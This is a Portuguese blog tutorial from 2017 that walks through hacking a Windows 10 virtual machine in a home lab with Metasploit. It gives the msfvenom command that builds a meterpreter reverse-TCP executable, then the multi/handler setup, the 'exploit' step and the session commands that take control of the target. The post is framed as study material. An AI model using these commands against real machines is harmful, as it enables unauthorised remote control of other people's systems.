Você está na página 1de 10

23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

MENU

SOLITUDE LAB

ESCRITO POR ALEX ANDRADE

1 DE DEZEMBRO DE 2017

INVADINDO WINDOWS 10
COM METASPLOIT
Usaremos o metasploit framework para gerar um payload que nos dará acesso a maquina
alvo que esteja na nossa rede.

No terminal do kali linux, abra o console do metasploit:

msfconsole

Leva alguns segundos pra carregar, logo após iremos usar o msfvenom que é um gerador
de payloads
Privacidade do metasploit,
e cookies: mas
Esse site utiliza antes
cookies. de gerar
Ao continuar precisamos
a usar informar
este site, você concordaalguns
com seuparâmetros
uso.
Para
parasaber
quemais, inclusive
nosso sobreseja
ataque comobem controlar os cookies,veja
sucedido, consulte aqui: antes
abaixo Política de
decookies
tentar executar no seu
terminal:
Fechar e aceitar

https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 1/10
23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.25.5


LPORT=12345

-p é o parâmetro que se refere a payload.

windows é o sistema alvo

meterpreter é o interpretador de comandos do metasploit

reverse_tcp é o tipo de conexão que será feita.

Em LHOST, iremos colocar o ip local da maquina atacante, caso você não saiba, basta
abrir outra aba do terminal e digitar ifconfig, como mostrado acima, no meu caso é
192.168.25.5.

LPORT é a porta através da qual a conexão será feita, como é apenas um exemplo,
usaremos a porta 12345 que por padrão não esta sendo usada por nenhum outro serviço.

Entendendo isso, agora precisamos dizer para o msfvenom qual o formato de saída e o
nome de nosso payload, como mostrado abaixo:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.25.5


LPORT=12345 -f exe > solitudelab.exe

Privacidade e cookies: Esse site utiliza cookies. Ao continuar a usar este site, você concorda com seu uso.
Para saber mais, inclusive sobre como controlar os cookies, consulte aqui: Política de cookies

https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 2/10
23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

-f é o parâmetro que diz qual será  o formato de saída, um executável.

> diz ao msfvenom que o nome do arquivo executável será solitudelab.exe

Então de forma resumida até agora, estamos usando o msfvenom que é um gerador de
payloads, para criar um payload que ira explorar um sistema windows, utilizando o
interpretador de comandos meterpreter, estabelecendo uma conexão tcp reversa na porta
12345, e o atacante que receberá essa conexão é o 192.168.25.5.

Feito isso, nosso payload será gerado na pasta root de nosso kali linux, e a saída do
terminal será essa:

Privacidade e cookies: Esse site utiliza cookies. Ao continuar a usar este site, você concorda com seu uso.
Para saber mais, inclusive sobre como controlar os cookies, consulte aqui: Política de cookies
Agora, vamos até a pasta onde nosso executável se encontra:

https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 3/10
23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

Pronto, basta copiar essa pasta para a máquina alvo. No meu caso, estou utilizando
VMWARE, e com as ferramentas do windows instaladas basta arrastar para transferir o
arquivo.

Agora que nosso payload foi gerado, precisamos esperar que o nosso alvo execute o
arquivo e saber quando isso acontecer. Para isso, usaremos o handler:

use multi/handler

Privacidade e cookies: Esse site utiliza cookies. Ao continuar a usar este site, você concorda com seu uso.
Para saber mais, inclusive sobre como controlar os cookies, consulte aqui: Política de cookies

https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 4/10
23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

Feito isso, precisamos informar ao nosso controlador, qual payload ele ficará escutando,
aguardando pela conexão,  e informar novamente o LHOST e o LPORT:

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.25.5

set LPORT 12345

Privacidade e cookies: Esse site utiliza cookies. Ao continuar a usar este site, você concorda com seu uso.
Para saber mais, inclusive sobre como controlar os cookies, consulte aqui: Política de cookies

https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 5/10
23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

Feito isso, basta digitar o comando final e aguardar pela execução do arquivo:

exploit

Isso significa que nosso handler ja esta na escuta de uma conexão com o nosso alvo.

Agora iremos até a nossa máquina alvo e iremos executar nosso arquivo:

Privacidade e cookies: Esse site utiliza cookies. Ao continuar a usar este site, você concorda com seu uso.
Para saber mais, inclusive sobre como controlar os cookies, consulte aqui: Política de cookies

https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 6/10
23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

Voalá, já estamos ‘dentro’ da nossa máquina alvo:

Podemos ver quais sessões estão abertas digitando:

sessions -i

No nosso caso, a sessão aberta foi a número 1, então para podermos executar comandos
basta digitarmos:

sessions -i 1
Privacidade e cookies: Esse site utiliza cookies. Ao continuar a usar este site, você concorda com seu uso.
Para saber mais, inclusive sobre como controlar os cookies, consulte aqui: Política de cookies

para mostrar como realmente estou ‘dentro’ do alvo windows 10:


https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 7/10
23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

sysinfo

De forma resumida, o que fizemos?

Usamos o console do metasploit para gerar um payload através do gerador de payloads 


msfvenom, com o objetivo de criar uma conexão tcp reversa na porta 12345 em um alvo
usando windows.

Por hoje é só.

Bons estudos :_)

P U B L I C A D O E M F E R R A M E N TA S , H A C K I N G .
C O M A TA G H A C K I N G , M E TA S P L O I T, W I N D O W S .

DEIXE UM COMENTÁRIO

Email (obrigatório) (Nunca tornar endereço público)

Nome (obrigatório)

Site

Privacidade e cookies:
Avise-me sobre Esse
novossitecomentários
utiliza cookies.por
Ao email.
continuar a usar este site, você concorda com seu uso.
Publicar comentário
Para saber mais, inclusive sobre como controlar os cookies, consulte aqui: Política de cookies
Avise-me sobre novas publicações por email.

https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 8/10
23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

PESQUISAR

Pesquisar …

ARQUIVO DO BLOG

outubro 2019 (1)
setembro 2019 (3)
agosto 2019 (5)
junho 2019 (1)
janeiro 2019 (1)
outubro 2018 (3)
setembro 2018 (20)
agosto 2018 (1)
maio 2018 (2)
abril 2018 (5)
janeiro 2018 (2)
dezembro 2017 (25)

Ú LT I M O S P O S T S

Protegido: Immersion English


Python para pentest
Pós-exploração windows

SEGUIR BLOG VIA EMAIL

Digite seu endereço de email para acompanhar esse blog e receber notificações de novos
posts por email.

Endereço de e-mail

SEGUIR

TA G S
Privacidade e cookies: Esse site utiliza cookies. Ao continuar a usar este site, você concorda com seu uso.
Para saber mais, inclusive sobre como controlar os cookies, consulte aqui: Política de cookies
adware aliases Amazon android apple banco de dados bluetooth botnet bruteforce BurpSuite calculadora criptografia
criptomoedas crunch CSS CSS-based ctf data breach data selling dirb engenharia social fui hackeado? google chrome grep

https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 9/10
23/06/2023, 13:29 Invadindo windows 10 com metasploit – Solitude Lab

hacker hackers hacking hackthebox hash Hash-identifier hashcat http httrack internet iOS iteraração kali
linux Linux Listas Mac malware md5 metasploit Modelo OSI mysql métodos python netcat PentestBox

phishing Por onde começar? portscan powershell processos Programação prompt proxy Python python 3

ransomware Redes russo segurança segurança web Shell Script skipfish socket sql

injection sqlmap ssh wannamine web windows wireless wordlist XSS

NEXT POST

Site criado com WordPress.com.

Privacidade e cookies: Esse site utiliza cookies. Ao continuar a usar este site, você concorda com seu uso.
Para saber mais, inclusive sobre como controlar os cookies, consulte aqui: Política de cookies

https://solitudelab.wordpress.com/2017/12/01/invasao-windows-com-payload-metasploit/ 10/10

Você também pode gostar